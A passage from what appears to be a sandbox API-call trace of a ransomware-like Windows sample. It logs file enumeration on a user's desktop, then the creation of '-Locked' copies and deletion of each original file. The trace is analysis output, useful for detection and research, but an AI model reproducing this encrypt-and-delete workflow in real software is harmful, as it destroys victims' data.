ftLastAccessTime.dwLowDateTime=0xd8e93720, ftLastAccessTime.dwHighDateTime=0x1d7dbc2, ftLastWriteTime.dwLowDateTime=0xd8e93720, ftLastWriteTime.dwHighDateTime=0x1d7dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x9ada, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png", cAlternateFileName="HAXUSM~1.PNG")) returned 1 [0298.084] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa1e1c40, ftCreationTime.dwHighDateTime=0x1d7db21, ftLastAccessTime.dwLowDateTime=0x26937cb0, ftLastAccessTime.dwHighDateTime=0x1d7e22b, ftLastWriteTime.dwLowDateTime=0x26937cb0, ftLastWriteTime.dwHighDateTime=0x1d7e22b, nFileSizeHigh=0x0, nFileSizeLow=0x142c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp", cAlternateFileName="")) returned 1 [0298.084] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf92f00f0, ftCreationTime.dwHighDateTime=0x1d7e70c, ftLastAccessTime.dwLowDateTime=0x48586ac0, ftLastAccessTime.dwHighDateTime=0x1d7e746, ftLastWriteTime.dwLowDateTime=0x48586ac0, ftLastWriteTime.dwHighDateTime=0x1d7e746, nFileSizeHigh=0x0, nFileSizeLow=0x12ecf, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi", cAlternateFileName="HHODZG~1.AVI")) returned 1 [0298.084] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb899930, ftCreationTime.dwHighDateTime=0x1d7e3df, ftLastAccessTime.dwLowDateTime=0x1bc21a10, ftLastAccessTime.dwHighDateTime=0x1d7e449, ftLastWriteTime.dwLowDateTime=0x1bc21a10, ftLastWriteTime.dwHighDateTime=0x1d7e449, nFileSizeHigh=0x0, nFileSizeLow=0x4a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi", cAlternateFileName="IWYHBO~1.AVI")) returned 1 [0298.085] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57d4eab0, ftCreationTime.dwHighDateTime=0x1d7dd2c, ftLastAccessTime.dwLowDateTime=0x4f0c7a00, ftLastAccessTime.dwHighDateTime=0x1d7e6f6, ftLastWriteTime.dwLowDateTime=0x4f0c7a00, ftLastWriteTime.dwHighDateTime=0x1d7e6f6, nFileSizeHigh=0x0, nFileSizeLow=0x1787d, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a", cAlternateFileName="")) returned 1 [0298.085] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b6ddf0, ftCreationTime.dwHighDateTime=0x1d7e686, ftLastAccessTime.dwLowDateTime=0xdda50770, ftLastAccessTime.dwHighDateTime=0x1d7e6b8, ftLastWriteTime.dwLowDateTime=0xdda50770, ftLastWriteTime.dwHighDateTime=0x1d7e6b8, nFileSizeHigh=0x0, nFileSizeLow=0x4e4f, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx", cAlternateFileName="L0CW~1.DOC")) returned 1 [0298.085] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc60d2b20, ftCreationTime.dwHighDateTime=0x1d7e13f, ftLastAccessTime.dwLowDateTime=0x634edb40, ftLastAccessTime.dwHighDateTime=0x1d7e6f4, ftLastWriteTime.dwLowDateTime=0x634edb40, ftLastWriteTime.dwHighDateTime=0x1d7e6f4, nFileSizeHigh=0x0, nFileSizeLow=0x6057, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv", cAlternateFileName="L3CXAN~1.MKV")) returned 1 [0298.085] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc396f90, ftCreationTime.dwHighDateTime=0x1d7dc64, ftLastAccessTime.dwLowDateTime=0xb8ec5480, ftLastAccessTime.dwHighDateTime=0x1d7de1e, ftLastWriteTime.dwLowDateTime=0xb8ec5480, ftLastWriteTime.dwHighDateTime=0x1d7de1e, nFileSizeHigh=0x0, nFileSizeLow=0x13cbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx", cAlternateFileName="L_WFYU~1.PPT")) returned 1 [0298.085] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8559540, ftCreationTime.dwHighDateTime=0x1d7e270, ftLastAccessTime.dwLowDateTime=0xeb453af0, ftLastAccessTime.dwHighDateTime=0x1d7e6de, ftLastWriteTime.dwLowDateTime=0xeb453af0, ftLastWriteTime.dwHighDateTime=0x1d7e6de, nFileSizeHigh=0x0, nFileSizeLow=0xeb56, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3", cAlternateFileName="")) returned 1 [0298.085] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359a59a0, ftCreationTime.dwHighDateTime=0x1d7e455, ftLastAccessTime.dwLowDateTime=0x775764e0, ftLastAccessTime.dwHighDateTime=0x1d7e64f, ftLastWriteTime.dwLowDateTime=0x775764e0, ftLastWriteTime.dwHighDateTime=0x1d7e64f, nFileSizeHigh=0x0, nFileSizeLow=0x16292, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav", cAlternateFileName="NRKT5N~1.WAV")) returned 1 [0298.085] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbc8d580, ftCreationTime.dwHighDateTime=0x1d7e6fb, ftLastAccessTime.dwLowDateTime=0xbdec11f0, ftLastAccessTime.dwHighDateTime=0x1d7e76f, ftLastWriteTime.dwLowDateTime=0xbdec11f0, ftLastWriteTime.dwHighDateTime=0x1d7e76f, nFileSizeHigh=0x0, nFileSizeLow=0x3621, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp", cAlternateFileName="")) returned 1 [0298.086] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd362020, ftCreationTime.dwHighDateTime=0x1d7e754, ftLastAccessTime.dwLowDateTime=0x709af980, ftLastAccessTime.dwHighDateTime=0x1d7e755, ftLastWriteTime.dwLowDateTime=0x709af980, ftLastWriteTime.dwHighDateTime=0x1d7e755, nFileSizeHigh=0x0, nFileSizeLow=0x1520, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt", cAlternateFileName="SKBR_O~1.PPT")) returned 1 [0298.086] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28b5bac0, ftCreationTime.dwHighDateTime=0x1d7d746, ftLastAccessTime.dwLowDateTime=0xc3fc26e0, ftLastAccessTime.dwHighDateTime=0x1d7de49, ftLastWriteTime.dwLowDateTime=0xc3fc26e0, ftLastWriteTime.dwHighDateTime=0x1d7de49, nFileSizeHigh=0x0, nFileSizeLow=0xe2c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg", cAlternateFileName="")) returned 1 [0298.087] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f9514b0, ftCreationTime.dwHighDateTime=0x1d7e727, ftLastAccessTime.dwLowDateTime=0xa82e8ec0, ftLastAccessTime.dwHighDateTime=0x1d7e737, ftLastWriteTime.dwLowDateTime=0xa82e8ec0, ftLastWriteTime.dwHighDateTime=0x1d7e737, nFileSizeHigh=0x0, nFileSizeLow=0x114f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv", cAlternateFileName="")) returned 1 [0298.087] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbdf3170, ftCreationTime.dwHighDateTime=0x1d7d9ba, ftLastAccessTime.dwLowDateTime=0x61bc6a40, ftLastAccessTime.dwHighDateTime=0x1d7e037, ftLastWriteTime.dwLowDateTime=0x61bc6a40, ftLastWriteTime.dwHighDateTime=0x1d7e037, nFileSizeHigh=0x0, nFileSizeLow=0x18100, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4", cAlternateFileName="")) returned 1 [0298.088] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd81ccee0, ftCreationTime.dwHighDateTime=0x1d7e3a3, ftLastAccessTime.dwLowDateTime=0xbe248520, ftLastAccessTime.dwHighDateTime=0x1d7e450, ftLastWriteTime.dwLowDateTime=0xbe248520, ftLastWriteTime.dwHighDateTime=0x1d7e450, nFileSizeHigh=0x0, nFileSizeLow=0xebfc, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4", cAlternateFileName="TUJLYX~1.MP4")) returned 1 [0298.088] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75e0bb40, ftCreationTime.dwHighDateTime=0x1d7d829, ftLastAccessTime.dwLowDateTime=0x603800f0, ftLastAccessTime.dwHighDateTime=0x1d7dcc5, ftLastWriteTime.dwLowDateTime=0x603800f0, ftLastWriteTime.dwHighDateTime=0x1d7dcc5, nFileSizeHigh=0x0, nFileSizeLow=0x43c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg", cAlternateFileName="V0ZO8W~1.JPG")) returned 1 [0298.088] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63377cb0, ftCreationTime.dwHighDateTime=0x1d7e254, ftLastAccessTime.dwLowDateTime=0xea3dd620, ftLastAccessTime.dwHighDateTime=0x1d7e3f6, ftLastWriteTime.dwLowDateTime=0xea3dd620, ftLastWriteTime.dwHighDateTime=0x1d7e3f6, nFileSizeHigh=0x0, nFileSizeLow=0x2061, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png", cAlternateFileName="")) returned 1 [0298.088] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d08e860, ftCreationTime.dwHighDateTime=0x1d7df82, ftLastAccessTime.dwLowDateTime=0x8ba89350, ftLastAccessTime.dwHighDateTime=0x1d7e736, ftLastWriteTime.dwLowDateTime=0x8ba89350, ftLastWriteTime.dwHighDateTime=0x1d7e736, nFileSizeHigh=0x0, nFileSizeLow=0x887b, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif", cAlternateFileName="WJV4VO~1.GIF")) returned 1 [0298.088] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x577e7830, ftCreationTime.dwHighDateTime=0x1d7e47d, ftLastAccessTime.dwLowDateTime=0x87fef250, ftLastAccessTime.dwHighDateTime=0x1d7e630, ftLastWriteTime.dwLowDateTime=0x87fef250, ftLastWriteTime.dwHighDateTime=0x1d7e630, nFileSizeHigh=0x0, nFileSizeLow=0x1365f, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf", cAlternateFileName="Y4HQQH~1.PDF")) returned 1 [0298.088] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x577e7830, ftCreationTime.dwHighDateTime=0x1d7e47d, ftLastAccessTime.dwLowDateTime=0x87fef250, ftLastAccessTime.dwHighDateTime=0x1d7e630, ftLastWriteTime.dwLowDateTime=0x87fef250, ftLastWriteTime.dwHighDateTime=0x1d7e630, nFileSizeHigh=0x0, nFileSizeLow=0x1365f, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf", cAlternateFileName="Y4HQQH~1.PDF")) returned 0 [0298.089] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0298.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af1d8) returned 1 [0298.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af1e4) returned 1 [0298.099] GetUserNameW (in: lpBuffer=0x1aefb4, pcbBuffer=0x1af22c | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1af22c) returned 1 [0298.663] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj-Locked", lpFilePart=0x0) returned 0x36 [0298.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.663] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.664] GetFileType (hFile=0x444) returned 0x1 [0298.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.664] GetFileType (hFile=0x444) returned 0x1 [0298.691] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x1af1b8 | out: pfEnabled=0x1af1b8) returned 0x0 [0298.753] CloseHandle (hObject=0x444) returned 1 [0298.753] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked", lpFilePart=0x0) returned 0x31 [0298.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.754] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\0aih45hu.jpg-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.754] GetFileType (hFile=0x444) returned 0x1 [0298.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.754] GetFileType (hFile=0x444) returned 0x1 [0298.756] CloseHandle (hObject=0x444) returned 1 [0298.756] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg", lpFilePart=0x0) returned 0x2a [0298.757] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\0aih45hu.jpg")) returned 1 [0298.758] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked", lpFilePart=0x0) returned 0x36 [0298.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.759] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4-0bkiu_zvudt.mkv-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.759] GetFileType (hFile=0x444) returned 0x1 [0298.759] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.759] GetFileType (hFile=0x444) returned 0x1 [0298.761] CloseHandle (hObject=0x444) returned 1 [0298.761] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv", lpFilePart=0x0) returned 0x2f [0298.761] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4-0bkiu_zvudt.mkv")) returned 1 [0298.762] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", lpFilePart=0x0) returned 0x69 [0298.762] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.762] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.763] GetFileType (hFile=0x444) returned 0x1 [0298.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.763] GetFileType (hFile=0x444) returned 0x1 [0298.764] CloseHandle (hObject=0x444) returned 1 [0298.765] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", lpFilePart=0x0) returned 0x62 [0298.765] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe")) returned 0 [0298.768] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf-Locked", lpFilePart=0x0) returned 0x30 [0298.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.768] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\autorun.inf-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.769] GetFileType (hFile=0x444) returned 0x1 [0298.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.769] GetFileType (hFile=0x444) returned 0x1 [0298.770] CloseHandle (hObject=0x444) returned 1 [0298.771] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf", lpFilePart=0x0) returned 0x29 [0298.771] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\autorun.inf")) returned 1 [0298.772] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc-Locked", lpFilePart=0x0) returned 0x3b [0298.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.772] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\csi0 apq22kpfx84um.doc-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.774] GetFileType (hFile=0x444) returned 0x1 [0298.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.774] GetFileType (hFile=0x444) returned 0x1 [0298.776] CloseHandle (hObject=0x444) returned 1 [0298.776] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc", lpFilePart=0x0) returned 0x34 [0298.776] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\csi0 apq22kpfx84um.doc")) returned 1 [0298.777] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc-Locked", lpFilePart=0x0) returned 0x2e [0298.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.777] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cx4ag.doc-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.777] GetFileType (hFile=0x444) returned 0x1 [0298.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.777] GetFileType (hFile=0x444) returned 0x1 [0298.780] CloseHandle (hObject=0x444) returned 1 [0298.781] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc", lpFilePart=0x0) returned 0x27 [0298.781] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cx4ag.doc")) returned 1 [0298.782] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx-Locked", lpFilePart=0x0) returned 0x36 [0298.783] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.783] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d-a24dz0snvx.xlsx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.784] GetFileType (hFile=0x444) returned 0x1 [0298.784] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.784] GetFileType (hFile=0x444) returned 0x1 [0298.785] CloseHandle (hObject=0x444) returned 1 [0298.786] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx", lpFilePart=0x0) returned 0x2f [0298.786] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d-a24dz0snvx.xlsx")) returned 1 [0298.788] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini-Locked", lpFilePart=0x0) returned 0x30 [0298.788] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.788] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.789] GetFileType (hFile=0x444) returned 0x1 [0298.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.790] GetFileType (hFile=0x444) returned 0x1 [0298.791] CloseHandle (hObject=0x444) returned 1 [0298.798] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini", lpFilePart=0x0) returned 0x29 [0298.799] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\desktop.ini")) returned 1 [0298.801] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav-Locked", lpFilePart=0x0) returned 0x3c [0298.801] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.801] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\g2jifnab-ihgfnotudc.wav-locked"), dwDesiredAccess=0xc0000000, 